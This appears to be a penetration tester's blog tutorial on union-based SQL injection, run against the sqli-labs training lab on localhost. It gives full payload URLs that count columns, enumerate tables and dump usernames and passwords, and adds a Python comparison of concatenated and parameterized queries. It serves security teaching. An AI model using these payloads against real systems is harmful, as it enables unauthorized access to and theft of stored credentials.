congdong007

Penetration Test, Software Developer


Union SQL Injection Detection Methods


  1. First, check for the existence of an SQL injection vulnerability.
  2. Then, determine the injection type: character-based, numeric-based, or search-based.
  3. Use “order by” to identify the number of columns the query returns; the highest index that still responds normally is the column count (3 here):
    ?id=1' order by 3 --+ (normal)
    ?id=1' order by 4 --+ (error)
  4. Once the number of columns is determined using “order by,” replace the values at the positions the page displays with MySQL functions such as database() and version().
  5. Retrieve the tables in the current database:
    ?id=-1' union select 1, group_concat('<br>', table_name), version() from information_schema.tables where table_schema=database()--+
  6. After obtaining the tables, retrieve the columns in those tables:
    ?id=-1' union select 1, group_concat('<br>', column_name), version() from information_schema.columns where table_schema=database() and table_name='users'--+
  7. Retrieve the data:
    ?id=-1' union select 1, group_concat('|', username), group_concat('|', password) from users--+

These steps describe how an attacker can detect and exploit a SQL injection vulnerability to extract information from a database.

Example of Union SQL Injection Operation

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 --+ (correct)
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 4 --+ (error)
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,database(),version() --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat('<br>',table_name) ,version() from information_schema.tables where table_schema=database()--+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat('<br>',column_name),version() from information_schema.columns where table_schema=database() and table_name='users' --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, username,password from users --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat('|',username),group_concat('|',password) from users --+
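
The same inputs sent to a query built by string concatenation and to a parameterized one, as an added example that is not code from the original post. SQLite stands in for the lab's MySQL database, and the query shape, table contents and function names are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the lab's `users` table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    return db

def lookup_vulnerable(db, user_id):
    # Assumed query shape: the request value is pasted into the SQL text, so a
    # quote in user_id closes the literal and the remainder is parsed as SQL.
    sql = ("SELECT id, username, password FROM users "
           "WHERE id='" + user_id + "' LIMIT 0,1")
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # The value is bound as data; it is never parsed as part of the statement.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return db.execute(sql, (user_id,)).fetchall()

def outcome(lookup, db, user_id):
    # What a client can observe: the rows returned, or a database error.
    try:
        return lookup(db, user_id)
    except sqlite3.Error:
        return "error"

# Inputs taken from the steps above; "--+" in a URL decodes to "-- ".
ORDER_BY_3 = "1' order by 3 -- "
ORDER_BY_4 = "1' order by 4 -- "
UNION_DUMP = "-1' union select 1, username,password from users -- "

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable),
                     ("parameterized", lookup_parameterized)):
        for value in ("1", ORDER_BY_3, ORDER_BY_4, UNION_DUMP):
            print(name, repr(value), "->", outcome(fn, db, value))
```

With the concatenated query, the order-by inputs produce the normal/error difference and the union input returns every row; with the bound parameter, all three are compared as a plain string against `id` and match nothing.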